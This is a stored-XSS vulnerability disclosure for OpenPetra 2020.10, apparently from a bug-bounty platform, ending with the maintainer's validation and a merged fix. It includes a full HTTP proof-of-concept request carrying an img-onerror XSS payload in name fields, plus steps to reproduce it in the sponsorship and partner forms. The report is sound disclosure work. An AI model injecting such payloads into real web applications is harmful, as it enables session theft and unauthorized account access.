Cross-site Scripting (XSS) - Stored in openpetra/openpetra

Valid

Reported on

Oct 29th 2021


Description

Multiple Stored XSS at openpetra 2020.10

Proof of Concept

// PoC.req
POST /api/serverMSponsorship.asmx/TSponsorshipWebConnector_MaintainChild HTTP/1.1
Host: demo.openpetra.org
Cookie: ASP.NET_SessionId=AEC44A33068E58B5DE583F3E; OpenPetraSessionID=b987029b-104f-45f1-aa29-339a49d0d55a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 287
Origin: https://demo.openpetra.org
Referer: https://demo.openpetra.org/SponsorShip/Children/MaintainChildren
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"APartnerKey":-1,"ASponsorshipStatus":"CHILDREN_HOME","AFirstName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AFamilyName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AGender":null,"ADateOfBirth":"null","AUserId":"","APhoto":"","new_photo":"","ALedgerNumber":"43","AUploadPhoto":false}

Step to Reproduct

Sponsorship

Goto Sponsorship choose to Add new child

At field First name and Surname input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

Partner

Goto Partner choose to Add new partner

At field Title , First name and Family name input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when user goto Donations choose to Add new transaction and search Donor Key with name of partner

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the openpetra team and are waiting to hear back a month ago
openpetra/openpetra maintainer validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
openpetra/openpetra maintainer
a month ago

Maintainer


I don't see it as a high risk, because you need to be registered user to be able to add sponsored children. But I see the problem in general, that we have to validate all input coming from the web. I will file a ticket at Github for the OpenPetra project, and I will fix it for the next release. Thank you for taking the time and reporting the issue!

lethanhphuc
a month ago

Researcher


You’re welcome ^^.

openpetra/openpetra maintainer confirmed that a fix has been merged on 82152f a month ago
The fix bounty has been dropped